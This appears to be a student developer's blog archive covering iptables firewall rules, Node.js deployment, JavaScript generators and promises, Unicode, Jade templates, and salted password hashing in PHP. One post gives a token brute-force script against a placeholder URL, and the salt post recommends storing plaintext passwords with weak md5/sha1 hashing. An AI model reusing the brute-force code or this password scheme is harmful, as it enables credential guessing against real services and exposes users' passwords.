After these basic setting rules, we add three tcp packets that have specific bits (flags) rules.

# -A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG FIN,SYN,RST,PSH,ACK,URG -j DROP 
# -A INPUT -p tcp -m tcp ! --tcp-flags FIN,SYN,RST,ACK SYN -m state --state NEW -j DROP
# -A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE -j DROP

Then we add the last rule to the INPUT chain. ESTABLISHED and RELATED refers to incoming packets that are part of an already established connection or related to and already established connection.

# iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

At last, we set the default policy on the INPUT chain and FORWARD chain.

# iptables -P INPUT DROP
# iptables -P FORWARD DROP

Now we can see our iptables setting.

# iptables -S
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG FIN,SYN,RST,PSH,ACK,URG -j DROP
-A INPUT -p tcp -m tcp ! --tcp-flags FIN,SYN,RST,ACK SYN -m state --state NEW -j DROP
-A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE -j DROP
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

It seems fine, and our iptables on Reverse Proxy Server needs to be saved.

# /sbin/service iptables save

For other three app-backend servers:

# iptables -S
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

And the database server:

# iptables -S
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport [Your_database_port] -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

End

If you have something to correct, welcome to point it out:D

References:

• wiki-centos-iptables
• ch-iptables

As we know, when running a node application in production, we need to keep stability, performance, security, and maintainability in mind.

Begin

At begin, my initial idea is to use nginx to proxy nodejs app. And the nginx plays a Load Balancer role, improving performance and reliability by distributing the workload across multiple servers, working as a front end server. What's more, your static files can also be handled much better.

Install Node.js && MongoDB

Node.js

My vps is CentOS, the first thing we need to do is to install node.

P.S. As I use koa, so I install version 0.11.9.

$ wget http://nodejs.org/dist/v0.11.9/node-v0.11.9.tar.gz
$ tar zxvf node-v0.11.9.tar.gz
$ cd node-v0.11.9
$ ./configure
$ make
$ sudo make install

After these things done, we can check our install.

$ node -v
0.11.9
$ npm -v
1.3.15

MongoDB

For Mongo, we can follow the official installation with RedHat.

$ vim /etc/yum.repos.d/mongodb.repo

For 64-bit system, add the following information to the repo file.

[mongodb]
name=MongoDB Repository
baseurl=http://downloads-distro.mongodb.org/repo/redhat/os/x86_64
gpgcheck=0
enabled=1

Now to install MongdoDB.

yum install mongo-10gen mongo-10gen-server

In my production, we need to open the mongod auth, edit /etc/mongod.conf to set auth=true.

And at last, we can use service mongod start or /etc/init.d/mongod start to start mongodb.:D

nginx.conf

As the idea above, we need to configure nginx.conf to proxy our app. As I'll explain, nginx is used for almost everything: gzip encoding, static file serving, HTTP caching, SSL handling, load balancing and spoon feeding clients. Here is my main nginx config:

http {
    ...
    server {
        listen 80;
        server_name reg.hduisa.cn;

        location ~ ^/(images/|img/|javascript/|js/|css/|stylesheets/|flash/|media/|static/|robots.txt|humans.txt|favicon.ico) {
            root /home/wwwroot/reg.hduisa.cn/public;
            access_log off;
            expires max;
        }

        location / {
            proxy_pass http://127.0.0.1:3000/;
        }

        access_log /home/wwwlogs/req.hduisa.cn.log access;
    }
    ...
}

The most important part of the section is proxy_pass, this tells nginx to proxy correctly. And for static assets, any requests for with a URI starting with images, img, css, js…will be matched by this location. If you want to proxy multi apps, you can use upstream. The upstream directive specifies that these two instances work in tandem as an upstream server for nginx(not only two).

http {
    ...
    upstream reg_hduisa_cn_upstream {
        server 127.0.0.1:3000;
        server 127.0.0.1:3001;
        keepalive 64;
    }
    server {
        ...
        location / {
            proxy_pass http://reg_hduisa_cn_upstream;
        }
        ...
    }   
}

Now we can pay attention to our app. At first, we should create a user.

Create Web User

For the security of our server, we should not run the app with root. So I create a web user for my own.

$ useradd -mrU koa -p password
$ su koa

And I use pm2 to manage my app. We need install it. And for globally npm install, we can detect whether the $NODE_PATH includes the location that npm installs globally or not.

$ which node
/usr/local/bin/node
$ which npm
/usr/local/bin/npm
$ echo $NODE_PATH

My $NODE_PATH is null, so add

export NODE_PATH=/usr/local/lib/node_modules

to my .bash_profile or .zshrc. The path is not absolute, it depends on your node directory. Now we can install pm2 globally.

$ npm install pm2 -g

As my koa app needs --harmony flag, we use pm2 to start.

$ pm2 start /home/wwwroot/reg.hduisa.cn/app.js --name reg.hduisa.cn --node-args="--harmony-generators" --watch

OK, that's the whole thing, you can see the process by

$ pm2 list

End

This's my first deployment with nodejs on production, if you have something to correct, welcome to point it:D

References:

• install-mongodb-on-red-hat-centos
• nodejs-in-production
• nodejs-for-production-part-2

Let's say we have a url www.example.com/hack, we need to get the information after post correct token. We already know the token's length is three, containing numbers.

Now we may write payload like this.

var bruteforcing = '0123456789';
var request = require('request');
var url = 'www.example.com/hack';

for (var i = 0; i < bruteforcing.length; i++) {
  for (var j = 0; j < bruteforcing.length; j++) {
    for (var k = 0; k < bruteforcing.length; k++) {
      request.post(url, {form:{ token: i + j + k }}, function (err, res, body) {
        if (body.indexOf('key') !== -1) {
          console.log(i + j + k);
          console.log(body);
        }
      })
    }
  }
}

OK, we have our first magical bruteforcing payload ready. Here's what you think will happen:

1. in a for loop, post token from 000 to 999
2. if find the respond body with keywords key, print token and body

However, Node is asynchronous. The request post will return before it even starts the post. It will return back to your for loop. And your for loop will move on to the next file. And the next one.

We have to wait for the callback. When it's called, only then do post our next number token. In other words, we need to call another function inside our callback. And this function needs to start post next number token. Hence, maybe we need a recursive function to do this.

A nice little recursive pattern we can use for this case:

var request = require('request');
var url = 'www.example.com/hack';
function bruteforcing(num) {
    if (num >= 000 && num <= 999) {
        request.post(url, {form:{ token: num }}, function (err, res, body) {
            if (body.indexOf('key') !== -1) {
              console.log(i + j + k);
              console.log(body);
            } else {
                bruteforcing(++num);
            }
        })
    }
}
bruteforcing(000);

In short, the pattern can be this:

repeater(i) {
    if (statement) {
        aysnc(function () {
            repeater(++i)
        })
    }
}

Referemce

• How to Write a For Loop With Callbacks

We talk about the new stuff with harmony, so make sure your harmony mode is enabled. With Chrome, go chrome://flags/, search harmony and enable it. With node, you need 0.11.* version, and execute node --harmony. For me, I use n to manage my node version, which is powered by TJ.

Generator

These days I was diving into Harmony generator, it is defined in ES6. So what calls generator? Let's begin with a simple code.

function* gen() {
    var index = 0;
    while(true) {
        yield index++;
    }
}
var gen = gen();
gen.next(); // return {value: 0, done: false}
gen.next(); // return {value: 1, done: false}
//...

As you can see, function gen has a method called next. This method returns an object with two properties: value and done. The value can be any value, and the done will be read as a boolean to distinguish whether the iterator has already to the end.

A simple iterator implement:

function gen(array) {
    var index = 0;
    return {
        next: function () {
            return index < array.length ?
                {vale: array[index++], done: false} :
                {done: true};
        }
    }
}

You may also notice the grammer function*, that's called generator function, and you can use keyword field there, which works combined with next(). When next is invoked, it starts the execution of the generator. The generator runs until it encounters a yield expression. Then it pauses and the execution goes back to the code that called next.

You can also pass parameters to next(). It behaves like this:

function* gen() {
    var index = 0;
    while (true) {
        var res = yield index++;
        console.log(res);
    }
}
/**  yield and next
 * gen() is invoked by a next.
 * when execute gen.next(88), the generator runs until
 * it encounter a yield and pauses, but not give the value
 * to res. when execute gen.next(888), it goes back to the
 * code and give the value to res, and the value is the 
 * parameter passed to next.
 */
var gen = gen(); // gen() is not invoked there
gen.next(88); // {value: 1, done: false} 
gen.next(888); // 888

It is like another way to execute callback. However, we can code synchronously to express the asynchronous progress without nested function.

for-of

This expression is used to iterate over iterable objects(including Array, Map, Set, arguments object and so on). Just a generator comprehension.

for (let i of [1, 2, 3]) {
    console.log(i * i); 
}
// 1, 4, 9

co

co is an ultimate generator made by TJ, using thunks or promises. A simple co example:

var co = require('co');
var fs = require('fs');

function read(file) {
  return function(fn){
    fs.readFile(file, 'utf8', fn);
  }
}

co(function *(){
  var a = yield read('1.txt');
  var b = yield read('2.txt');
  var c = yield read('3.txt');
  console.log([a,b,c]);
})();

We pass a generator fn to co and co return a thunk. A thunk is just like the traditional node-style callback whith a signature of: (err, res).

// read thunk
function read(path, encoding) {
    return function (cb) {
        fs.readFile(path, encoding, cb);
    }
}
//invoke
read('package.json', 'utf8')(function(err, str){
    //...
})

Actually, in co, the yieldable objects supports thunks, promises, generators, generator functions and array. co will iterate many times until the fn.done is true. A most simple co implement:

function co(GenFunc) {
  return function(cb) {
    var gen = GenFunc();
    (function next() {
        if (gen.next) {
            gen.next().done ? cb && cb() : next();
        }
    })();
  }
}

co also support passing arguments into the generator.

var exec = require('co-exec');
co(function *(cmd) {
  var res = yield exec(cmd);
  return res;
})('pwd', done); // done is the callback function

co support error handle as well. And in github, it says:

Co is careful to relay any errors that occur back to the generator, including those within the thunk, or from the thunk's callback.

At last, I'm strongly recommend that you should read co's source code, it is less than 300 lines. Have fun:D

Reference

• MDN-The-Iterator-protocol
• MDN-for-of
• es6-iterators-generators-and-iterables
• co

When Node brings us an asynchronous world, our applications begin to become non-blocking and much faster. However, it also makes our code complex and unpredictable. See this simple code:

function readJSON(filename, callback) {
    fs.readFile(filename, 'utf8', function (err, res) {
        if (err) return callback(err);
        try {
            res = JSON.parse(res);
        } catch (e) {
            return callback(e);
        }
        callback(null, res);
    });
}

The code above is somewhat ugly and we actually can't make sure what arguments input to callback, and we must do try-catch for JSON.parse to handle the error. Luckily, a solution for asynchronous called Promises help us handle errors naturally and make code clean.

Promises

As its name means, a promise represents the result of an asynchronous operation with three states:

• Pending - The initial state
• Fulfilled - A successful operation
• Rejected - A failed operation

And once a promise is fulfilled or rejected, it is immutable.

Begin Promise

Let's begin with such codes:

var fs = require('fs')
  , Promise = require('promise');

function readFile(filename, enc){
  return new Promise(function (fulfill, reject){
    fs.readFile(filename, enc, function (err, res){
      if (err) reject(err);
      else fulfill(res);
    });
  });
}

function readJSON(filename){
  return readFile(filename, 'utf8').then(function (res){
    console.log(JSON.parse(res));
  }, function (err) {
    console.log(err);
  });
}

As we can see, we re-write our readJSON function, there is no unpredictable callback and we almost use Promise to finish our code. In our code, we use new Promise to construct the promise, which requires a function called resolver, and the resolver function is passed two arguments: resolve and reject.

new Promise(function (resolve, reject) {})

resolve and reject

The resolve and reject should be called with a single argument, and promise will be fulfilled or rejected with that value. A special situation is when resolve is called with a promise(A) then the returned promise takes on the state of that new promise(A).

Things go easily in promise, we only need to pass the value to resolve() or reject() to wait for the result and then handle it through then(). We do not care the asynchronous action's creation time and eventual success or failure, just let asynchronous methods return values like synchronous methods. So what actually then() is?

Promise.prototype.then(onFulfilled, onRejected)

This prototype method follows the Promises/A+ spec. Simply to say, it appends fulfillment and rejection handlers to the promise, and returns a new promise resolving to the return value of the called handler. And it can be chained.

new Promise(function (fulfill, reject){})
.then(onFulfilled, onRejected)
.then(onFulfilled, onRejected)
.then(onFulfilled, onRejected)
// ...

Browser

Actually, there is not only node module promise support Promises, in some browser, like Chrome 32 and latest Firefox, have already support it. It is similar to what we write before.

if (window.Promise) {
    var promise = new Promise(function (resolve, reject) {
        var request = new XMLHttpRequest();
        request.open('GET', 'http://api.icndb.com/jokes/random');
        request.onload = function () {
            if (request.status == 200) {
                resolve(request.response);
            } else {
                reject(Error(request.statusText));
            }
        };
        request.onerror = function () {
            reject(Error('Error fetching data'));
        };
        request.send();
    }).then(function (data) {
        console.log(JSON.parse(data).value.joke);
    }, function (err) {
        console.log(err.message);
    })
} else {
    console.log('Promise is not supported')
}

More static methods

We have seen how promises help us to do with complex asynchronous code, actually, there are more advanced patterns for promise use and some of the helper methods may make our Promise more concise. I just refer it simply.

• Promise.resolve(value)
• Promise.reject(reason)
• Promise.all(iterable)
• Promise.race(iterable)

If you want to read more, see MDN or Promise/A+.

Reference

• Promise/A+
• then/Promise
• overview-javascript-promises
• MDN

Before Unicode

It would be a long story to explain how unicode comes. Before its existence, a character encoding named ASCII was created by America, is trying to rule the relation with English and Binary. And one byte corresponds one character. For more detail, see there.

However, ASCII only includes 128 characters encoding. As for other languages, it is not enough. Hence, many charsets based on ASCII appears like ISO 8859, trying to extend more characters encoding to express more language.

Unicode

There are many encoding existing all over the world. And it would be handy if there is a encoding includes all characters, and every character corresponds one unique encoding. Hence, Unicode exists, trying to make it. Unicode is a charset which can include more than one millionsymbols, and every character encoding is unique. And Unicode identifies characters by a name and an interger number called its code point. For example, © is named “copyright sign” and has U+00A9 - 0xA9 can bewritten as 169 in decimal - as its code point.

On Unicode wiki, we can learn that the Unicode code space is divided into seventeen planes of 2^16 code points each. Some of these code points have not yet been assigned character values, some are reserved for private use, and some are permanently reserved as non-characters. The code points in each plane have the hexadecimal values xy0000 to xyFFFF, where xy is a hex value from 00 to 10, signifying which plane the values belong to. Usually we use the first plane(xy is 00) most, which called the Basic Multilingual Plane or BMP. It contains the code points from U+0000 to U+FFFF. And it may express one character more than one byte.

Problem

However, Unicode is just a symbol set, which doesn't rule how to save binary code. Although Unicode like U+4E25 can even express a Chinese character like 严, how can computer regard it as ASCII or Unicode?

As we know, an english alphabet just needs one byte, if we rule Unicode uniformly, it can cause many waste.

Implement

Hence, based on such problem, many implementations appear try to make it, like UTF-8, UTF-16, UCS-2 and many more.

UTF-16 && UCS-2

UTF-16 is an implement which express a character using two or four bytes, while UCS-2 just uses two bytes.

UTF-8

Actually, UTF-8 is the most popular one in internet. It is flexible to express a character using one to four bytes, and can change the length of byte according to different character. Next is a rule of the UTF-8 encoding.

/*
Unicode             | UTF-8
hexadecimal         | binary
0000 0000-0000 007F | 0xxxxxxx     One byte
0000 0080-0000 07FF | 110xxxxx 10xxxxxx    Two bytes
0000 0800-0000 FFFF | 1110xxxx 10xxxxxx 10xxxxxx    Three bytes
0001 0000-0010 FFFF | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx 
*/

End

This is just my little learning about unicode, if you want to learn more details, visit wiki to have fun.

Reference

• ASCII,UTF-8,Unicode
• UTF-8
• Unicode

In Javascript compiler, Bitwise Operators treat their operands as a sequence of 32 bits, just zeros or ones. And the maximum and minimum integers are 2147483647 and -2147483648, which represented through a 32bit signed number.

Signed 32-bit integers

var maximum = 2147483647;
maximum.toString(2); // 1111111111111111111111111111111
var minimum = -2147483648;
minimum.toString(2); // -10000000000000000000000000000000

Notes that the maximum and minimum above in Javascript. Things may get strang if you exceed the scope. And if you lack the basis, go to MDN to learn more.

Bitwise Operators

In Javascript, the bitwise operators convert the operands to 32-bit integers and express it a series of bits. Each bit correspond its bit, and the result in constructed bitwise.

Bitwise Operands

As we know, Javascript is a weak typing programming language. Actually, all values can be bitwise operand, for example, a function or a string. However, I guess, javascript will convert the operand to int or long at first internally according to its engine. Some values like function or string which can not be correctly converted will be 0.

// 88.88 -> 88, 88 | 0 -> 88
console.log(88.88 | 0); // 88
// '88.88' -> 88, 88 | 0 -> 88
console.log('88.88' | 0); // 88
// 'sss' -> 0, 0 | 1 -> 1
console.log('sss' | 1); // 1
// [] -> 0, 0 & -1 -> 0
console.log([] & -1); // 0

Skills with Bitwise Operators

Your codes with nice usage of bitwise operators will be much more efficient. And the situation below you may meet frequently.

// x represents the number under the scope of maximum and minimum
// x & 0 will return 0
console.log(Math.random() * 2147483647 & 0); // 0
console.log(Math.random() * -2147483648 & 0); // 0
// x & -1 will return x
console.log(Math.random() * 2147483647 & -1); // random number x
console.log(Math.random() * -2147483648 & -1); // random number x
// x | 0 will return x
console.log(Math.random() * 2147483647 | 0); // random number x
console.log(Math.random() * -2147483648 | 0); // random number x
// x | -1 will return -1
console.log(Math.random() * 2147483647 | -1); // -1
console.log(Math.random() * -2147483648 | -1); // -1

// Even or Odd, Odd returns 1, Even returns 0
console.log(1111 & 1);  // 1
console.log(2222 & 1);  // 0

// ~x will return -(x + 1)
console.log(~(Math.random() * 2147483647)); // -(x + 1)

// x ^ 0 will return x, x ^ -1 will return ~x
console.log(Math.random() * 2147483647 ^ 0); // random number x
console.log(Math.random() * 2147483647 ^ -1); // ~x

// x << y will return x * 2 ^ y (^ is power)
console.log(8 << 4); // 128

// replace name.indexOf(subName) === 3
var name = 'Tinple';
var subName = 'ple';
if (~name.indexOf(subName)) {
    // if true
} else {
    // if else
}

END

Using bitwise operator correctly will enhance your code performance. And the datas in this post are tested in V8, if exist some errors, welcome to point it!

References:

• MDN
• rubylouvre

Unlike other template engine such as EJS and handlebars, jade has its own elegancy and lots of features. Firstly, you can install it via npm: npm install jade -g or npm install jade. And if you install it globally, try to detect whether the $NODE_PATH includes the location that npm installs globally or not.

@tinple ➜  ~  which node
/usr/local/bin/node
@tinple ➜  ~  which npm
/usr/local/bin/npm
@tinple ➜  ~  echo $NODE_PATH
/usr/local/lib/node_modules

If your $NODE_PATH is null, try to add

export NODE_PATH=/usr/local/lib/node_modules

to your .bash_profile or .zshrc. The path is not absolute, it depends on your node directory.

Jade is a clean, whitespace sensitive syntax for writing html. Just ignore the process that how to turn .jade to .html at begin. Pay attention to its succinct writemode, for example, file demo.jade:

doctype html
html(lang="en")
  head
    title= pageTitle
  body
    h1 Hello #{name}
    ul#books
      li.A
        a(href="#book-a") Book A
      li.B
        a(href="#book-b") Book B
    // comment
    p.
      Tinple and Kristine

    if love
      p A couple
    else
      p Single man

and locals:

var locals = {
    pageTitle: 'Jade',
    name: 'Tinple',
    love: true
}

Finally it becomes:

<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Jade</title>
    </head>
    <body>
        <h1>Hello Tinple</h1>
        <ul id="books">
            <li class="A"><a href="#book-a">Book A</a></li>
            <li class="B"><a href="#book-b">Book B</a></li>
        </ul>
        <!-- comment-->
        <p>Tinple and Kristine</p>
        <p>A couple</p>
    </body>
</html>

And there are many other features there, you can learn it by yourself. Next talking about its api, command line and browser-support, yes, jade supports them.

Command Line

When jade is installed, you can run with jade --help to look for the usage. For the above example, you can run with

jade --obj demo.json demo.jade

demo.json:

{
    "pageTitle": "Jade",
    "name": "Tinple",
    "love": true
}

Then the std push the data rendered demo.html. And that's the result. Also, you can use other command options to meet your own requirements.

API

Jade offers api to developers. For full API, see there. Below is the simple usage for compile, render string or a file.

runDemo.js:

var jade = require('jade'),
    fs = require('fs');

var options = {
    pretty: true,
    debug: true,
    compileDebug: true
}

var locals = {
    pageTitle: 'Jade',
    name: 'Tinple',
    love: true
}

// three ways, just choose one

// compile
fs.readFile('demo.jade', 'utf8', function (err, data) {
    if (err) throw err;
    console.log(data);
    var fn = jade.compile(data, options);
    var html = fn(locals);
    console.log(html);
});

// render, pseudocode
var html = jade.render('string of jade', merge(options, locals));

// renderFile
var html = jade.renderFile('demo.jade', locals);
console.log(html);

Choose any way, if just like me, just render the file, then run with node runDemo.js, and you will see the result in your terminal. For more details like the options or other function arguments, try to read the document api.

Browsers Support

The latest version of jade can be download for the browser. And it only supports the very latest browsers. I strongly recommended that you pre-compile your jade templates to JavaScript and then just use the runtime.js library on the client. So how does client-side template works? The whole workflow looks like this:

1. Edit .jade file

2. Compile template files to JavaScript

3. Include runtime.js file

So edit demo.jade first, we can copy it easily. Then run with

jade --client --no-debug demo.jade

you will get a file demo.js which is JavaScript function that you call with values you want to render your template with and func returns you HTML that you just need to put somewhere on page. Now you just need to include that Jade runtime plus this file that got generated via:

<script src='runtime.js'></script>
<script src='demo.js'></script>
<script src='http://code.jquery.com/jquery-1.10.2.min.js'></script>
<script>
    $('body').append(template({pageTitle: 'Jade',name: 'Tinple', love: true}));
</script>

File runtime.js is in your jade source code directory.

END

jade is nice, not only express uses it but also there are many more developers push the contributions about the jade on github, this essay just introduces a little, for more reading, like its feature(mixin, filter, include…etc), api, implementations or many other, visiting jade.

References:

• jade
• jade-github
• npm-global-install
• client-side-jade

1. 月初买了本《Node.js 入门经典》，在准备比赛闲暇看了大部分内容，感受最深的是如果这辈子不接触下Node.JS都不好意思说异步了。这丫简直太强大了！倒是这个月忙着比赛的事情没太多实践过，寒假要好好学下。

2. 初步浅阅了《Javascript模式》，讲的很深入，大部分内容跟乌龟书讲的差不多。不过也深受俾益。

3. 借着项目回顾了暑假学的Python笔记，回想起了很多，下个月也是正式接触Python的Web编程。P.S.：PHP，Python，Node.JS天啊。。我觉得自己是个疯子。

4. 这个月再一次在stackoverflow上被吐槽提问不明确，问题不清晰。也是意识到自己用英文表述问题的缺陷（沟通）。也是因此开始积极参与到stackoverflow中去。

5. 一次攻防大赛让自己学到了许多零零散散的东西，比如服务器的iptables，Linux下高效的工作方式，以及其他种种。也是尝试自己做了几道题，深感佩服黑客们强大的思维。P.S.：据说服务器上收获了好多马。。。

Work:

1. 这个月初赛和决赛的圆满举办，坚信teamwork的确是我所喜欢且愿意为团队积极投入进去的。一方面是自己的责任感与担当，一方面是团队合作成功带来的兴奋与成就感，也不再是孤军奋战，尤其是任何一个人都是团队的核心的时候。

2. 大二上班级还是成功举办了秋游，虽然相比前两次的确不怎么样，但还是能凑齐26个人实属不易。也是由此引发对一个集体的思考，在初期火候旺盛的情况下如何才能最大化的保住后期的火候呢？的确是需要很强大的管理能力。

3. 再一次向新生培训，但结果自己不是很满意，一来准备匆匆心不在焉，二来的确是自己的表达能力需要锻炼。做技术的，自己人沟通互相了解是一点，向小白讲述让他明白又是另一点，这很重要。

Life:

1. 这个月白天几乎大部分时间花在了比赛上，晚上倒还是很早地就回寝睡了，寝室差点就成了只是一个休息的地方。愧疚。筹备比赛的日子倒还是挺滋润的。

2. 比赛结束后的月末休息了一阵，想仔细回味记录下这几个月的忙碌，却也又是浮躁地最终还是没去写，只是头脑里闪现出许多片段。还没找到接下来奋斗的点，倒也悠哉悠哉。

End:

So what's called salt?

In cryptography, a salt is random data that are used as an additional input to a one-way function that hashes a password or passphrase.

And a new salt is randomly generated for each password. In my apply page, the salt and the password are concatenated and processed with a cryptographic hash function, and the resulting output (but not the original password) is sent to users email while the salt and the original password is stored in a database.

Hashing allows for later authentication while defending against compromise of the plaintext password in the event that the database is somehow compromised. And in this way, the output password will be somehow entirely safe although the original password may be cracked.

All right, it is time to begin. In PHP, the code like this:

$length = 32;
$mode = 0;
switch ($mode) 
{
    case '1':
    $str = '1234567890';
    break;
    case '2':
    $str = 'abcdefghijklmnopqrstuvwxyz';
    break;
    case '3':
    $str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    break;
    default:
    $str = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    break;
}
$pass = '';
$l = strlen($str) - 1;
$num = 0;
for($i = 0;$i < $length;$i++){
    $num = rand(0, $l);
    $a = $str[$num];
    $pass .= $a;
}

$saltLength = 6;
$salt = '';
for ($a = 0; $a < $saltLength; $a++) {
        $salt .= chr(mt_rand(97,122));    
}

echo 'Salt:' . $salt;
echo '<br>';
echo 'Original Password:' . $pass;  
echo '<br>';
// Simply add the salt to the end
echo 'Outping:' . md5(sha1($pass.$salt));

That's all. And next you can do what you want to do, maybe send the output password to users via email or some other things.

Remember that it is common for a web application to store in a database the hash value of a user's password. Without a salt, a successful SQL injection attack may yield easily crackable passwords. You can read more on wiki about the beneficial of the salt.

Have fun :D

你一直在跑，但总是有人在你前面，有人在你后面。只不过当你停下来的时候，你前面的人就多了，哪怕你只是放缓脚步。马拉松如此，很多时候，生活也是如此。

谨以此纪念，明年再来。

• weibo
• zhihu
• taobao

Look at their design, layout and user experience, you may find some different stuffs, and recall what if we visit those websites on a Remote-device?Besides, you see, the nature of them varies, SNS, Social Q & A and C2C.

And nowadays, much more like desktop system web applications appear, like webqq, and one more amazing thing, x86-Simulator.You just can not image it!

However, no pain, no gain.Maybe it is really difficult for us to do the stuffs above.But we can hold it step by step, just see those single nice pages, it only requires your imagination.Or maybe you prefer to develop a web game, see the simple tetris game I coded long ago.Yep, you can also finish your own web application game! Even more helpful things like hduhelp.

Only time and determination require!

I will show you some skills you may love to learn, you can learn these skills following the order.

• HTML & CSS
• Javascript
• NodeJs
• And maybe more other skills..(we will talk about it later)

Wait, there are some useful tools I want to show you as well.

• Web Slide controlled remotely
• online markdown editor
• liquidluck

Also some really nice stuffs we usually use, you may touch later if you want to insist on.

• github
• stackoverflow
• evernote
• Git

And if you have intersts about those things I refer, just find me directly and I will tell you more after.Do not be shy!